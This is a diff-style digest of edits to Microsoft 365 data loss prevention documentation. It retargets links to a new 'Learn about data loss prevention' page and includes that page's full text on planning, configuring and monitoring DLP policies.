With a DLP policy, you can:
- **View DLP alerts and reports showing content that matches your organizationΓÇÖs DLP policies.** To view alerts and metadata related to your DLP policies you can use the [DLP Alerts Management Dashboard](dlp-configure-view-alerts-policies.md). You can also view policy match reports to assess how your organization is complying with a DLP policy. If a DLP policy allows users to override a policy tip and report a false positive, you can also view what users have reported
-
+
+-->
+## Create and manage DLP policies
+ You create and manage DLP policies on the Data loss prevention page in the Microsoft 365 Compliance center. ![Data loss prevention page in the Office 365 Security &amp; Compliance Center](../media/943fd01c-d7aa-43a9-846d-0561321a405e.png)
-## What a DLP policy contains
+<!-- MOVED TO LEARN ABOUT ## What a DLP policy contains
A DLP policy contains a few basic things:
A DLP policy contains a few basic things:
- **Conditions** the content must match before the rule is enforced. For example, a rule might be configured to look only for content containing Social Security numbers that's been shared with people outside your organization.
- - **Actions** that you want the rule to take automatically when content matching the conditions is found. For example, a rule might be configured to block access to a document and send both the user and compliance officer an email notification.
+ - **Actions** that you want the rule to take automatically when content matching the conditions is found. For example, a rule might be configured to block access to a document and send both the user and compliance officer an email notification. -->
You can use a rule to meet a specific protection requirement, and then use a DLP policy to group together common protection requirements, such as all of the rules needed to comply with a specific regulation.
For example, you might have a DLP policy that helps you detect the presence of i
![Diagram shows that DLP policy contains locations and rules](../media/c006860c-2d00-42cb-aaa4-5b5638d139f7.png)
-### Locations
+<!-- MOVED TO LEARN ABOUT ### Locations
DLP policies are applied to sensitive items across Microsoft 365 locations and can be further scoped as detailed in this table.
DLP policies are applied to sensitive items across Microsoft 365 locations and c
|Teams chat and channel messages |accounts | |Windows 10 devices |user or group | |Microsoft Cloud App Security |instance |-
+ -->
If you choose to include specific distribution groups in Exchange, the DLP policy will be scoped only to the members of that group. Similarly excluding a distribution group will exclude all the members of that distribution group from policy evaluation. You can choose to scope a policy to the members of distribution lists, dynamic distribution groups, and security groups. A DLP policy can contain no more than 50 such inclusions and exclusions.
compliance Dlp Chrome Get Started https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/dlp-chrome-get-started.md
Use these procedures to roll out the Microsoft Compliance Extension.
To use Microsoft Compliance Extension, the device must be onboarded into endpoint DLP. Review these articles if you are new to DLP or endpoint DLP - [Learn about Microsoft Compliance Extension](dlp-chrome-learn-about.md)-- [Overview of data loss prevention](data-loss-prevention-policies.md)
+- [Learn about data loss prevention](dlp-learn-about-dlp.md)
- [Create, test, and tune a DLP policy](create-test-tune-dlp-policy.md) - [Create a DLP policy from a template](create-a-dlp-policy-from-a-template.md) - [Learn about endpoint data loss prevention](endpoint-dlp-learn-about.md)
Now that you have onboarded devices and can view the activity data in Activity e
- [Learn about Endpoint data loss prevention ](endpoint-dlp-learn-about.md) - [Using Endpoint data loss prevention ](endpoint-dlp-using.md)-- [Overview of data loss prevention](data-loss-prevention-policies.md)
+- [Learn about data loss prevention](dlp-learn-about-dlp.md)
- [Create, test, and tune a DLP policy](create-test-tune-dlp-policy.md) - [Get started with Activity explorer](data-classification-activity-explorer.md) - [Microsoft Defender for Endpoint](https://docs.microsoft.com/windows/security/threat-protection/)
compliance Dlp Chrome Learn About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/dlp-chrome-learn-about.md
description: "The Microsoft Compliance Extension extends monitoring and control
# Learn about the Microsoft Compliance Extension (preview)
-[Endpoint data loss prevention (endpoint DLP)](endpoint-dlp-learn-about.md) extends the activity monitoring and protection capabilities of [Microsoft 365 data loss prevention (DLP)](data-loss-prevention-policies.md) to sensitive items that are on Windows 10 devices. Once devices are onboarded into the Microsoft 365 compliance solutions, the information about what users are doing with sensitive items is made visible in [activity explorer](data-classification-activity-explorer.md) and you can enforce protective actions on those items via [DLP policies](create-test-tune-dlp-policy.md).
+[Endpoint data loss prevention (endpoint DLP)](endpoint-dlp-learn-about.md) extends the activity monitoring and protection capabilities of [Microsoft 365 data loss prevention (DLP)](dlp-learn-about-dlp.md) to sensitive items that are on Windows 10 devices. Once devices are onboarded into the Microsoft 365 compliance solutions, the information about what users are doing with sensitive items is made visible in [activity explorer](data-classification-activity-explorer.md) and you can enforce protective actions on those items via [DLP policies](create-test-tune-dlp-policy.md).
Once the Microsoft Compliance Extension is installed on a Windows 10 device, organizations can monitor when a user attempts to access or upload a sensitive item to a cloud service using Google Chrome and enforce protective actions via DLP.
See [Get started with the Microsoft Compliance Extension](dlp-chrome-get-started
- [Learn about Microsoft 365 Endpoint data loss prevention](endpoint-dlp-learn-about.md) - [Getting started with Microsoft Endpoint data loss prevention](endpoint-dlp-getting-started.md) - [Using Microsoft Endpoint data loss prevention](endpoint-dlp-using.md)-- [Overview of data loss prevention](data-loss-prevention-policies.md)
+- [Learn about data loss prevention](dlp-learn-about-dlp.md)
- [Create, test, and tune a DLP policy](create-test-tune-dlp-policy.md) - [Get started with Activity explorer](data-classification-activity-explorer.md) - [Microsoft Defender for Endpoint](https://docs.microsoft.com/windows/security/threat-protection/)
compliance Dlp Conditions And Exceptions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/dlp-conditions-and-exceptions.md
The tables in the following sections describe the conditions and exceptions that
||||| | With importance | condition: *WithImportance* <br/> exception: *ExceptIfWithImportance* | Importance | Messages that are marked with the specified importance level. | | Content character set contains words | condition: *ContentCharacterSetContainsWords* <br/> *ExceptIfContentCharacterSetContainsWords* | CharacterSets | Messages that have any of the specified character set names. |
-| Has sender override | condition: *HasSenderOverride* <br/> exception: *ExceptIfHasSenderOverride* | n/a | Messages where the sender has chosen to override a data loss prevention (DLP) policy. For more information about DLP policies see [Data loss prevention](./data-loss-prevention-policies.md). |
+| Has sender override | condition: *HasSenderOverride* <br/> exception: *ExceptIfHasSenderOverride* | n/a | Messages where the sender has chosen to override a data loss prevention (DLP) policy. For more information about DLP policies see [Learn about data loss prevention](./dlp-learn-about-dlp.md) |
| Message type matches | condition: *MessageTypeMatches* <br/> exception: *ExceptIfMessageTypeMatches* | MessageType | Messages of the specified type. | |The message size is greater than or equal to| condition: *MessageSizeOver* <br/> exception: *ExceptIfMessageSizeOver* |`Size`|Messages where the total size (message plus attachments) is greater than or equal to the specified value. **Note**: Message size limits on mailboxes are evaluated before mail flow rules. A message that's too large for a mailbox will be rejected before a rule with this condition is able to act on the message.|
compliance Dlp Learn About Dlp https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/dlp-learn-about-dlp.md
+
+ Title: "Learn about data loss prevention"
+f1.keywords:
+- NOCSH
+++ Last updated :
+audience: ITPro
++
+localization_priority: Normal
+
+- M365-security-compliance
+search.appverid:
+- MET150
+description: "Learn how to protect your sensitive information using Microsoft 365 data loss prevention policies and tools and take a tour through the DLP lifecycle."
++
+# Learn about data loss prevention
+
+Organizations have sensitive information under their control such as financial data, proprietary data, credit card numbers, health records, or social security numbers. To help protect this sensitive data and reduce risk, they need a way to prevent their users from inappropriately sharing it with people who shouldn't have it. This practice is called data loss prevention (DLP).
+
+In Microsoft 365, you implement data loss prevention by defining and applying DLP policies. With a DLP policy, you can identify, monitor, and automatically protect sensitive items across:
+
+- Microsoft 365 services such as Teams, Exchange, SharePoint, and OneDrive
+- Office applications such as Word, Excel, and PowerPoint
+- Windows 10 endpoints
+- non-Microsoft cloud apps
+- on-premises file shares and on-premises SharePoint.
+
+Microsoft 365 detects sensitive items by using deep content analysis, not by just a simple text scan. Content is analyzed for primary data matches to keywords, by the evaluation of regular expressions, by internal function validation, and by secondary data matches that are in proximity to the primary data match. Beyond that DLP also uses machine learning algorithms and other methods to detect content that matches your DLP policies.
+
+## DLP is part of the larger Microsoft 365 Compliance offering
+
+Microsoft 365 DLP is just one of the Microsoft 365 Compliance tools that you will use to help protect your sensitive items wherever they live or travel. You should understand the other tools in the Microsoft 365 Compliance tools set, how they interrelate, and work better together. See, [Microsoft 365 compliance tools](protect-information.md) to learn more about the information protection process.
+
+## Protective actions of DLP policies
+
+Microsoft 365 DLP policies are how you monitor the activities that users take on sensitive items at rest, sensitive items in transit, or sensitive items in use and take protective actions. For example, when a user attempts to take a prohibited action, like copying a sensitive item to an unapproved location or sharing medical information in an email or other conditions laid out in a policy, DLP can:
+
+- show a pop-up policy tip to the user that warns them that they may be trying to share a sensitive item inappropriately
+- block the sharing and, via a policy tip, allow the user to override the block and capture the users' justification
+- block the sharing without the override option
+- for data at rest, sensitive items can be locked and moved to a secure quarantine location
+- for Teams chat, the sensitive information will not be displayed
+
+All DLP monitored activities are recorded to the [Microsoft 365 Audit log](search-the-audit-log-in-security-and-compliance.md) by default and routed to [Activity explorer](data-classification-activity-explorer.md). When a user performs an action that meets the criteria of a DLP policy, and you have alerts configured, DLP provides alerts in the [DLP alert management dashboard](dlp-configure-view-alerts-policies.md).
+
+## DLP lifecycle
+
+A DLP implementation typically follows these major phases.
+
+- [Plan for DLP](#plan-for-dlp)
+- [Prepare for DLP](#prepare-for-dlp)
+- [Deploy your policies in production](#deploy-your-policies-in-production)
++
+<!--ADD DIAGRAM OF THE DLP LIFECYCLE WORK ON WITH MAS-->
+
+### Plan for DLP
+
+Microsoft 365 DLP monitoring and protection are native to the applications that users use every day. This helps to protect your organizations' sensitive items from risky activities even if your users are unaccustomed to data loss prevention thinking and practices. If your organization and your users are new to data loss prevention practices, the adoption of DLP may require a change to your business processes and there will be a culture shift for your users. But, with proper planning, testing and tuning, your DLP policies will protect your sensitive items while minimizing any potential business process disruptions.
+
+**Technology planning for DLP**
+
+Keep in mind that DLP as a technology can monitor and protect your data at rest, data in use and data in motion across Microsoft 365 services, Windows 10 devices, on-premises file shares, and on-premises SharePoint. There are planning implications for the different locations, the type of data you want to monitor and protect, and the actions to be taken when a policy match occurs.
+
+**Business processes planning for DLP**
+
+DLP policies can block prohibited activities, like inappropriate sharing of sensitive information via email. As you plan your DLP policies, you must identify the business processes that touch your sensitive items. The business process owners can help you identify appropriate user behaviors that should be allowed and inappropriate user behaviors that should be protected against. You should plan your policies and deploy them in test mode, and evaluate their impact via [activity explorer](data-classification-activity-explorer.md) first, before applying them in more restrictive modes.
+
+**Organizational culture planning for DLP**
+
+A successful DLP implementation is as much dependent on getting your users trained and acclimated to data loss prevention practices as it is on well planned and tuned policies. Since your users are heavily involved, be sure to plan for training for them too. You can strategically use policy tips to raise awareness with your users before changing the policy enforcement from test mode to more restrictive modes.
+
+<!--For more information on planning for DLP, including suggestions for deployment based on your needs and resources, see [Planning for Microsoft 365 data loss prevention](dlp-plan-for-dlp.md).-->
+
+### Prepare for DLP
+
+You can apply DLP policies to data at rest, data in use, and data in motion in locations, such as:
+
+- Exchange Online email
+- SharePoint Online sites
+- OneDrive accounts
+- Teams chat and channel messages
+- Microsoft Cloud App Security
+- Windows 10 devices
+- On-premises repositories
+
+Each one has different pre-requisites. Sensitive items in some locations, like Exchange online, can be brought under the DLP umbrella by just configuring a policy that applies to them. Others, such as on-premises file repositories require a deployment of Azure Information Protection (AIP) scanner. You'll need to prepare your environment, code draft policies, and test them thoroughly before activating any blocking actions.
+
+### Deploy your policies in production
+
+#### Design your policies
+
+Start by defining your control objectives, and how they apply across each respective workload. Draft a policy that embodies your objectives. Feel free to start with one workload at a time, or across all workloads - there's no impact yet.
+
+#### Implement policy in test mode
+
+Evaluate the impact of the controls by implementing them with a DLP policy in test mode. It's ok to apply the policy to all workloads in test mode, so that you can get the full breadth of results, but you can start with one workload if you need to.
+
+#### Monitor outcomes and fine-tune the policy
+
+While in test mode, monitor the outcomes of the policy and fine-tune it so that it meets your control objectives while ensuring you aren't adversely or inadvertently impacting valid user workflows and productivity. Here are some examples of things to fine-tune:
+
+- adjusting the locations and people/places that are in or out of scope
+- tune the conditions and exceptions that are used to determine if an item and what is being done with it matches the policy
+- the sensitive information definition/s
+- the actions
+- the level of restrictions
+- add new controls
+- add new people
+- add new restricted apps
+- add new restricted sites
+
+#### Enable the control and tune your policies
+
+Once the policy meets all your objectives, turn it on. Continue to monitor the outcomes of the policy application and tune as needed. In general, policies take effect about an hour after being turned on. <!--See, LINK TO topic for SLAs for location specific details-- >
+
+## DLP policy configuration overview
+
+You have flexibility in how you create and configure your DLP policies. You can start from a predefined template and create a policy in just a few clicks or you can design your own from the ground up. No matter which you choose, all DLP policies require the same information from you.
+
+1. **Choose what you want to monitor** - Microsoft 365 comes with many predefined policy templates to help you get started or you can create a custom policy.
+ - A predefined policy template: Financial data, Medical and health data, Privacy data all for various countries and regions.
+ - A custom policy that uses the available sensitive information types, retention labels, and sensitivity labels.
+2. **Choose where you want to monitor** - You pick one or more locations that you want DLP to monitor for sensitive information. You can monitor:
+
+location | include/exclude by|
+|||
+|Exchange email| distribution groups|
+|SharePoint sites |sites |
+|OneDrive accounts |accounts or distribution groups |
+|Teams chat and channel messages |accounts |
+|Windows 10 devices |user or group |
+|Microsoft Cloud App Security |instance |
+|On-premises repositories| repository file path|
+
+3. **Choose the conditions that must be matched for a policy to be applied to an item** - you can accept pre-configured conditions or define custom conditions. Some examples are:
+
+- item contains a specified kind of sensitive information that is being used in a certain context. For example, 95 social security numbers being emailed to recipient outside your org.
+- item has a specified sensitivity label
+- item with sensitive information is shared either internally or externally
+
+4. **Choose the action to take when the policy conditions are met** - The actions depend on the location where the activity is happening. Some examples are:
+
+- SharePoint/Exchange/OneDrive: Block people who are outside your organization form accessing the content. Show the user a tip and send them an email notification that they are taking an action that is prohibited by the DLP policy.
+- Teams Chat and Channel: Block sensitive information from being shared in the chat or channel
+- Windows 10 Devices: Audit or restrict copying a sensitive item to a removeable USB device
+- Office Apps: Show a popup notifying the user that they are engaging in a risky behavior and block or block but allow override.
+- On-premises file shares: move the file from where it is stored to a quarantine folder
+
+> [!NOTE]
+> The conditions and the actions to take are defined in an object called a Rule.
+
+<!--## Create a DLP policy
+
+All DLP policies are created and maintained in the Microsoft 365 Compliance center. See, INSERT LINK TO ARTICLE THAT WILL START WALKING THEM THROUGH THE POLICY CREATION PROCEDURES for more information.-->
+
+After you create a DLP policy in the Compliance Center, it's stored in a central policy store, and then synced to the various content sources, including:
+
+- Exchange Online, and from there to Outlook on the web and Outlook.
+- OneDrive for Business sites.
+- SharePoint Online sites.
+- Office desktop programs (Excel, PowerPoint, and Word).
+- Microsoft Teams channels and chat messages.
+
+After the policy's synced to the right locations, it starts to evaluate content and enforce actions.
+
+## Viewing policy application results
+
+DLP reports a vast amount of information into Microsoft 365 from monitoring, policy matches and actions, and user activities. You'll need to consume and act on that information to tune your policies and triage actions taken on sensitive items. The telemetry goes into the [Microsoft 365 Compliance center Audit Logs](search-the-audit-log-in-security-and-compliance.md#search-the-audit-log-in-the-compliance-center) first, is processed, and makes its way to different reporting tools. Each reporting tool has a different purpose.
+
+### DLP Alerts Dashboard
+
+When DLP takes an action on a sensitive item, you can be notified of that action via a configurable alert. Rather than having these alerts pile up in a mailbox for you to sift through, the Compliance center makes them available in the [DLP Alerts Management Dashboard](dlp-configure-view-alerts-policies.md). Use the DLP Alerts dashboard to configure alerts, review them, triage them and track resolution of DLP Alerts. Here's an example of alerts generated by policy matches and activities from Windows 10 devices.
+
+> [!div class="mx-imgBorder"]
+> ![Alert info](../media/Alert-info-1.png)
+
+You can also view details of the associated event with rich metadata in the same dashboard
+
+> [!div class="mx-imgBorder"]
+> ![event info](../media/Event-info-1.png)
+
+### Reports
+
+The [DLP reports](view-the-dlp-reports.md#view-the-reports-for-data-loss-prevention) show broad trends over time and give specific insights into:
+
+- **DLP Policy Matches** over time and filter by date range, location, policy, or action
+- **DLP incident matches** also shows matches over time, but pivots on the items rather than the policy rules.
+- **DLP false positives and overrides** shows the count of false positives and, if configured, user-overrides along with the user justification.
+
+### DLP Activity Explorer
+
+The Activity explorer tab on the DLP page has the *Activity* filter preset to *DLPRuleMatch*. Use this tool to review activity related to content that contains sensitive info or has labels applied, such as what labels were changed, files were modified, and matched a rule.
+
+![screenshot of the DLPRuleMatch scoped activity explorer ](../media/dlp-activity-explorer.png)
+
+For more information, see [Get started with activity explorer](data-classification-activity-explorer.md)
+
+To learn more about Microsoft 365 DLP, see:
+
+- [Learn about Microsoft 365 Endpoint data loss prevention](endpoint-dlp-learn-about.md)
+- [Learn about the default data loss prevention policy in Microsoft Teams (preview)](dlp-teams-default-policy.md)
+- [Learn about the Microsoft 365 data loss prevention on-premises scanner (preview)](dlp-on-premises-scanner-learn.md)
+- [Learn about the Microsoft Compliance Extension (preview)](dlp-chrome-learn-about.md)
+- [Learn about the data loss prevention Alerts dashboard](dlp-alerts-dashboard-learn.md)
compliance Dlp Microsoft Teams https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/dlp-microsoft-teams.md
To learn more about licensing requirements, see [Microsoft 365 Tenant-Level Serv
## Overview of DLP for Microsoft Teams
-Recently, [data loss prevention](data-loss-prevention-policies.md) (DLP) capabilities were extended to include Microsoft Teams chat and channel messages, **including private channel messages**.
+Recently, [data loss prevention](dlp-learn-about-dlp.md) capabilities were extended to include Microsoft Teams chat and channel messages, **including private channel messages**.
> [!IMPORTANT] > DLP currently applies only to the actual messages in the chat or channel thread. Activity notifications -- which include a short message preview and appear based on a user's notification settings -- are **not** included in Teams DLP at this time. Any sensitive information present in the part of the message that appears in the preview will remain visible in the notification even after the DLP policy has been applied and removed sensitive information the message itself.
Returning to our example, where a sender shared a social security number in a Te
> [!div class="mx-imgBorder"] > ![Message blocked](../media/dlp-teams-blockedmessage-notification-to-user.png)
-The **What's this?** link opens an [article](data-loss-prevention-policies.md) about DLP policies, which helps explain why the message was blocked.
- ### To customize policy tips To perform this task, you must be assigned a role that has permissions to edit DLP policies. To learn more, see [Permissions](data-loss-prevention-policies.md#permissions).
compliance Dlp On Premises Scanner Get Started https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/dlp-on-premises-scanner-get-started.md
Now that you have deployed a test policy for DLP on-premises locations and can v
- [Learn about DLP on-premises scanner (preview)](dlp-on-premises-scanner-learn.md) - [Use DLP on-premises scanner (preview)](dlp-on-premises-scanner-use.md)-- [Overview of data loss prevention](data-loss-prevention-policies.md)
+- [Learn about data loss prevention](dlp-learn-about-dlp.md)
- [Create, test, and tune a DLP policy](create-test-tune-dlp-policy.md) - [Get started with Activity explorer](data-classification-activity-explorer.md) - [Microsoft 365 subscription](https://www.microsoft.com/microsoft-365/compare-microsoft-365-enterprise-plans?rtc=1)
compliance Dlp On Premises Scanner Learn https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/dlp-on-premises-scanner-learn.md
description: "Microsoft 365 data loss prevention on-premises scanner extends mon
# Learn about the Microsoft 365 data loss prevention on-premises scanner (preview)
-Microsoft data loss prevention on-premises scanner is part of the Microsoft 365 data loss prevention (DLP) suite of features that you can use to discover and protect sensitive items across Microsoft 365 services. For more information about all of MicrosoftΓÇÖs DLP offerings, see [Overview of data loss prevention](data-loss-prevention-policies.md).
+Microsoft data loss prevention on-premises scanner is part of the Microsoft 365 data loss prevention (DLP) suite of features that you can use to discover and protect sensitive items across Microsoft 365 services. For more information about all of MicrosoftΓÇÖs DLP offerings, see [Learn about data loss prevention](dlp-learn-about-dlp.md).
The **DLP on-premises scanner** crawls on-premises data-at-rest in file shares and SharePoint document libraries and folders for sensitive items that, if leaked, would pose a risk to your organization or pose a risk of compliance policy violation. This gives you the visibility and control you need to ensure that sensitive items are used and protected properly, and to help prevent risky behavior that might compromise them. The DLP on-premises scanner detects sensitive information by using [built-in](sensitive-information-type-entity-definitions.md) or [custom sensitive information](create-a-custom-sensitive-information-type.md) types, [sensitivity labels](sensitivity-labels.md) or file properties. The information about what users are doing with sensitive items is made visible in [activity explorer](data-classification-activity-explorer.md) and you can enforce protective actions on those items via [DLP policies](create-test-tune-dlp-policy.md).
Now that you've learned about DLP on-premises scanner, your next steps are:
- [Getting started with the Microsoft data loss prevention on-premises scanner](dlp-on-premises-scanner-get-started.md) - [Use the Microsoft data loss prevention on-premises scanner](dlp-on-premises-scanner-use.md)-- [Overview of data loss prevention](data-loss-prevention-policies.md)
+- [Learn about data loss prevention](dlp-learn-about-dlp.md)
- [Create, test, and tune a DLP policy](create-test-tune-dlp-policy.md) - [Get started with Activity explorer](data-classification-activity-explorer.md)
compliance Dlp On Premises Scanner Use https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/dlp-on-premises-scanner-use.md
To help familiarize you with DLP on-premises features and how they surface in DL
> [!IMPORTANT] > These DLP on-premises scenarios are not the official procedures for creating and tuning DLP policies. Refer to the below topics when you need to work with DLP policies in general situations:
->- [Overview of data loss prevention](data-loss-prevention-policies.md)
+>- [Learn about data loss prevention](dlp-learn-about-dlp.md)
>- [Get started with the default DLP policy](get-started-with-the-default-dlp-policy.md) >- [Create a DLP policy from a template](create-a-dlp-policy-from-a-template.md) >- [Create, test, and tune a DLP policy](create-test-tune-dlp-policy.md)
If you want to enforce DLP rules on the scanned files, enforcement must be enabl
- [Learn about DLP on-premises scanner (preview)](dlp-on-premises-scanner-learn.md) - [Get started with DLP on-premises scanner (preview)](dlp-on-premises-scanner-get-started.md)-- [Overview of data loss prevention](data-loss-prevention-policies.md)
+- [Learn about data loss prevention](dlp-learn-about-dlp.md)
- [Create, test, and tune a DLP policy](create-test-tune-dlp-policy.md) - [Get started with Activity explorer](data-classification-activity-explorer.md)
compliance Dlp Teams Default Policy https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/dlp-teams-default-policy.md
description: "Learn about the default data loss prevention policy in Microsoft T
# Learn about the default data loss prevention policy in Microsoft Teams (preview)
-[Data loss prevention](data-loss-prevention-policies.md) (DLP) capabilities have been extended to include Microsoft Teams chat and channel messages, including private channel messages. As a part of this release, we created a default DLP policy for first-time customers to Compliance center.
+[Data loss prevention](dlp-learn-about-dlp.md) capabilities have been extended to include Microsoft Teams chat and channel messages, including private channel messages. As a part of this release, we created a default DLP policy for first-time customers to Compliance center.
## Applies to
compliance Dlp Use Policies Non Microsoft Cloud Apps https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/dlp-use-policies-non-microsoft-cloud-apps.md
description: Learn how to use dlp policies for non-Microsoft cloud apps.
# Use data loss prevention policies for non-Microsoft cloud apps (preview)
-Data loss prevention (DLP) policies to non-Microsoft cloud apps are part of the Microsoft 365 DLP suite of features; using these features, you can discover and protect sensitive items across Microsoft 365 services. For more information about all Microsoft DLP offerings, see [Overview of data loss prevention](./data-loss-prevention-policies.md?view=o365-worldwide).
+Data loss prevention (DLP) policies to non-Microsoft cloud apps are part of the Microsoft 365 DLP suite of features; using these features, you can discover and protect sensitive items across Microsoft 365 services. For more information about all Microsoft DLP offerings, see [Learn about data loss prevention](dlp-learn-about-dlp.md).
You can use DLP policies to non-Microsoft cloud apps to monitor and detect when sensitive items are used and shared via non-Microsoft cloud apps. Using these policies gives you the visibility and control that you need to ensure that they're correctly used and protected, and it helps prevent risky behavior that might compromise them.
compliance Endpoint Dlp Configure Proxy https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/endpoint-dlp-configure-proxy.md
Related topics
- [Learn about Endpoint data loss prevention ](endpoint-dlp-learn-about.md) - [Using Endpoint data loss prevention ](endpoint-dlp-using.md)-- [Overview of data loss prevention](data-loss-prevention-policies.md)
+- [Learn about data loss prevention](dlp-learn-about-dlp.md)
- [Create, test, and tune a DLP policy](create-test-tune-dlp-policy.md) - [Get started with Activity explorer](data-classification-activity-explorer.md) - [Microsoft Defender for Endpoint](/windows/security/threat-protection/)
compliance Endpoint Dlp Getting Started https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/endpoint-dlp-getting-started.md
description: "Set up Microsoft 365 Endpoint data loss prevention to monitor file
# Get started with Endpoint data loss prevention
-Microsoft Endpoint data loss prevention (Endpoint DLP) is part of the Microsoft 365 data loss prevention (DLP) suite of features you can use to discover and protect sensitive items across Microsoft 365 services. For more information about all of MicrosoftΓÇÖs DLP offerings, see [Overview of data loss prevention](data-loss-prevention-policies.md). To learn more about Endpoint DLP, see [Learn about Endpoint data loss prevention](endpoint-dlp-learn-about.md)
+Microsoft Endpoint data loss prevention (Endpoint DLP) is part of the Microsoft 365 data loss prevention (DLP) suite of features you can use to discover and protect sensitive items across Microsoft 365 services. For more information about all of MicrosoftΓÇÖs DLP offerings, see [Learn about data loss prevention](dlp-learn-about-dlp.md). To learn more about Endpoint DLP, see [Learn about Endpoint data loss prevention](endpoint-dlp-learn-about.md)
Microsoft Endpoint DLP allows you to monitor Windows 10 devices and detect when sensitive items are used and shared. This gives you the visibility and control you need to ensure that they are used and protected properly, and to help prevent risky behavior that might compromise them.
Now that you have onboarded devices and can view the activity data in Activity e
- [Learn about Endpoint data loss prevention ](endpoint-dlp-learn-about.md) - [Using Endpoint data loss prevention ](endpoint-dlp-using.md)-- [Overview of data loss prevention](data-loss-prevention-policies.md)
+- [Learn about data loss prevention](dlp-learn-about-dlp.md)
- [Create, test, and tune a DLP policy](create-test-tune-dlp-policy.md) - [Get started with Activity explorer](data-classification-activity-explorer.md) - [Microsoft Defender for Endpoint](/windows/security/threat-protection/)
compliance Endpoint Dlp Learn About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/endpoint-dlp-learn-about.md
description: "Microsoft 365 Endpoint data loss prevention extends monitoring of
# Learn about Microsoft 365 Endpoint data loss prevention
-You can use Microsoft 365 data loss prevention (DLP) to monitor the actions that are being taken on items you've determined to be sensitive and to help prevent the unintentional sharing of those items. For more information on DLP, see [Overview of data loss prevention](data-loss-prevention-policies.md).
+You can use Microsoft 365 data loss prevention (DLP) to monitor the actions that are being taken on items you've determined to be sensitive and to help prevent the unintentional sharing of those items. For more information on DLP, see [Learn about data loss prevention](dlp-learn-about-dlp.md).
**Endpoint data loss prevention** (Endpoint DLP) extends the activity monitoring and protection capabilities of DLP to sensitive items that are on Windows 10 devices. Once devices are onboarded into the Microsoft 365 compliance solutions, the information about what users are doing with sensitive items is made visible in [activity explorer](data-classification-activity-explorer.md) and you can enforce protective actions on those items via [DLP policies](create-test-tune-dlp-policy.md).
Now that you've learned about Endpoint DLP, your next steps are:
- [Getting started with Microsoft Endpoint data loss prevention](endpoint-dlp-getting-started.md) - [Using Microsoft Endpoint data loss prevention](endpoint-dlp-using.md)-- [Overview of data loss prevention](data-loss-prevention-policies.md)
+- [Learn about data loss prevention](dlp-learn-about-dlp.md)
- [Create, test, and tune a DLP policy](create-test-tune-dlp-policy.md) - [Get started with Activity explorer](data-classification-activity-explorer.md) - [Microsoft Defender for Endpoint](/windows/security/threat-protection/)
compliance Endpoint Dlp Using https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/endpoint-dlp-using.md
To help familiarize you with Endpoint DLP features and how they surface in DLP p
> [!IMPORTANT] > These Endpoint DLP scenarios are not the official procedures for creating and tuning DLP policies. Refer to the below topics when you need to work with DLP policies in general situations:
->- [Overview of data loss prevention](data-loss-prevention-policies.md)
+
+>- [Learn about data loss prevention](dlp-learn-about-dlp.md)
>- [Get started with the default DLP policy](get-started-with-the-default-dlp-policy.md) >- [Create a DLP policy from a template](create-a-dlp-policy-from-a-template.md) >- [Create, test, and tune a DLP policy](create-test-tune-dlp-policy.md)
These scenarios require that you already have devices onboarded and reporting in
- [Learn about Endpoint data loss prevention](endpoint-dlp-learn-about.md) - [Get started with Endpoint data loss prevention](endpoint-dlp-getting-started.md)-- [Overview of data loss prevention](data-loss-prevention-policies.md)
+- [Learn about data loss prevention](dlp-learn-about-dlp.md)
- [Create, test, and tune a DLP policy](create-test-tune-dlp-policy.md) - [Get started with Activity explorer](data-classification-activity-explorer.md) - [Microsoft Defender for Endpoint](/windows/security/threat-protection/)
compliance Get Started With The Default Dlp Policy https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/get-started-with-the-default-dlp-policy.md
To quickly refine the default DLP policy, you can choose to have it:
- Block access to the content containing the sensitive information, but allow the user to override and share or send if they need to.
-For more information on incident reports or restricting access, see [Overview of data loss prevention policies](data-loss-prevention-policies.md).
+For more information on incident reports or restricting access, see [Data loss prevention reference](data-loss-prevention-policies.md).
If you want to change these options later, you can edit the default DLP policy at any time - see the next section.
compliance How Dlp Works Between Admin Centers https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/how-dlp-works-between-admin-centers.md
In Office 365, you can create a data loss prevention (DLP) policy in two different admin centers: -- In the **Security & Compliance Center**, you can create a single DLP policy to help protect content in SharePoint, OneDrive, Exchange, and now Microsoft Teams. When possible, we recommend that you create a DLP policy here. For more information, see [DLP in the Security & Compliance Center](data-loss-prevention-policies.md).
+- In the **Security & Compliance Center**, you can create a single DLP policy to help protect content in SharePoint, OneDrive, Exchange, and now Microsoft Teams. When possible, we recommend that you create a DLP policy here. For more information, see [Data Loss Prevention reference](data-loss-prevention-policies.md).
- In the **Exchange admin center**, you can create a DLP policy to help protect content only in Exchange. This policy can use Exchange mail flow rules (also known as transport rules), so it has more options specific to handling email. For more information, see [DLP in the Exchange admin center](/exchange/security-and-compliance/data-loss-prevention/data-loss-prevention).
compliance Information Protection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/information-protection.md
Last updated audience: Admin-+ localization_priority: Priority search.appverid:
search.appverid:
- m365solution-mip - m365initiative-compliance
+recommendations: false
description: "Implement Microsoft Information Protection (MIP) to help you protect sensitive information wherever it lives or travels."
To help prevent accidental oversharing of sensitive information, use the followi
|Capability|What problems does it solve?|Get started| |:|:|:|
-|[Data loss prevention (DLP)](data-loss-prevention-policies.md)| Helps prevent unintentional sharing of sensitive items. | [Get started with the default DLP policy](get-started-with-the-default-dlp-policy.md)|
